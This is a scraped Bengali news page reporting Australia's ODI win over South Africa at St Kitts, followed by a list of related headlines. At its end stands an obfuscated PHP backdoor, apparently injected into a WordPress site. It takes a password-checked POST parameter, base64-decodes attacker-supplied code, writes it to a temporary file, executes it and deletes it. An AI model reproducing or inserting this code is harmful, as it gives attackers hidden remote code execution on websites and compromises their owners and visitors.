শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

হঠাৎ তাসের ঘর দক্ষিণ আফ্রিকার ব্যাটিং!

Australia-South-Africaস্পোর্টস ডেস্ক : অস্ট্রেলিয়ার বাইরে ডেভিড ওয়ার্নারের প্রথম ওয়ানডে সেঞ্চুরি গড়ে দিয়েছিল বড় সংগ্রহের ভিত। তাঁর ১০৯ রানের পাশাপাশি উসমান খাজার ৫৯ আর স্টিভেন স্মিথের ৫২ রানের দুটি ইনিংসের ওপর ভর করে অস্ট্রেলিয়া গড়েছিল ২৮৮ রানের সংগ্রহ। লক্ষ্য বড় হলেও জয়ের পথে দক্ষিণ আফ্রিকা এগিয়ে গিয়েছিল অনেকটাই। কিন্তু শেষ দিকে প্রোটিয়ারা আবার ভেঙে পড়ল চাপে। মাত্র ৪২ রানে শেষ ৭ উইকেট হারিয়ে ম্যাচটা তারা তুলে দিল অস্ট্রেলিয়ার হাতেই।

ক্যারিবীয় দ্বীপ সেন্ট কিটসের উইকেট যে গায়ানার মতো ছিল না, সেটা হয়তো বোঝা যাচ্ছে দুই দলের সংগ্রহ থেকেই। বোলারদের জন্য কিছুটা কঠিন এই উইকেটে প্রথম থেকেই ছড়ি ঘুরিয়েছেন ব্যাটসম্যানরা। তবে শেষ দিকে অস্ট্রেলীয় বোলাররা রীতিমতো জাদুই দেখিয়েছেন। মিচেল স্টার্ক, জশ হ্যাজেলউড কিংবা লেগ স্পিনার অ্যাডাম জামপা। এই ত্রয়ীর সম্মিলিত প্রয়াসেরই ৩ উইকেটে ২১০ থেকে ৪৭.৪ ওভারে ২৫২ রানেই শেষ প্রোটিয়ারা।

হাশিম আমলার ৬০, ফ্যাফ ডু প্লেসির ৬৩ রানের পাশাপাশি জেপি ডুমিনির ব্যাট থেকে এসেছে ৪১। তবে দক্ষিণ আফ্রিকার বিপর্যয়ের শুরুটা হয় এবি ডি ভিলিয়ার্স ৩৯ রানে ফেরার সঙ্গে সঙ্গেই। ২১০ রানের মাথায় ভিলিয়ার্স ফেরার সঙ্গে সঙ্গেই তাসের ঘরের মতোই ভেঙে পড়ে দক্ষিণ আফ্রিকার ব্যাটিং লাইনআপ।

স্টার্ক, হ্যাজেলউড, জামপা—প্রত্যেকেই নিয়েছেন ৩টি করে উইকেট। এর আগে অবশ্য অস্ট্রেলিয়ার ইনিংসে একটি করে উইকেট পেয়েছেন দক্ষিণ আফ্রিকার কাইল অ্যাবট, কাগিসো রাবাদা, ওয়েইন পার্নেল ও অ্যারন ফাঙ্গিসো। সেরা বোলার ছিলেন লেগ স্পিনার ইমরান তাহির। ৪৫ রানের বিনিময়ে তিনি পেয়েছেন ২ উইকেট। তথ্যসূত্র: রয়টার্স।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}